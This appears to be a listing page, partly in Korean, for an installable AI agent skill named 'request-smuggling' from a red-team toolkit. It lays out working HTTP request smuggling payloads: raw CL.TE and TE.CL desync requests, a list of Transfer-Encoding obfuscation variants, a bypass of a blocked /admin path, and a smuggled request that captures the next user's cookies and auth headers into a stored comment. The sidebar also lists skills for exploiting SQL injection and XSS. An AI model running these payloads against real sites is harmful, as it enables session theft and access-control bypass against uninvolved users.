원클릭으로
request-smuggling
HTTP request smuggling via CL.TE/TE.CL desync and cache poisoning
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
메뉴
HTTP request smuggling via CL.TE/TE.CL desync and cache poisoning
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
Business logic vulnerability detection — workflow bypass, price manipulation, state abuse, and application-specific flaws
Detect PII, credentials, and corporate sensitive data in API responses, source code, files, headers, and database extracts
Detect and exploit SQL injection vulnerabilities in web application parameters
Test for authentication and authorization flaws including credential attacks, session issues, and access control bypasses
Detect and exploit cross-site scripting vulnerabilities in web applications
Discover hidden parameters, test values, and identify input handling anomalies
| name | request-smuggling |
| description | HTTP request smuggling via CL.TE/TE.CL desync and cache poisoning |
| origin | RedteamOpencode |
run_tool curl (raw request crafting)Send request with both CL and TE headers: ``` POST / HTTP/1.1 Host: target.com Content-Length: 6 Transfer-Encoding: chunked
0
G
```
If next request gets GPOST → CL.TE confirmed
Time-based: backend waits for more chunked data → timeout difference
Send: ``` POST / HTTP/1.1 Host: target.com Content-Length: 3 Transfer-Encoding: chunked
1
G
0
```
If next request returns unexpected response → TE.CL confirmed
Time-based: backend reads CL bytes only, rest poisons next request
Transfer-Encoding: chunked (standard)Transfer-Encoding : chunked (space before colon)Transfer-Encoding: chunked\r\nTransfer-Encoding: xTransfer-Encoding: x\r\nTransfer-Encoding: chunkedTransfer-Encoding:\tchunked (tab)Transfer-Encoding: chunked (extra space)X: x\r\nTransfer-Encoding: chunked (header injection)TrAnSfEr-EnCoDiNg: chunkedTransfer-Encoding:\n chunked/admin path that frontend blocksSmuggle partial request that captures next user's request: ``` POST /store-comment HTTP/1.1 Content-Length: 400
comment=
```
Next user's request (with cookies/auth) appended to comment body
Read stolen headers from stored location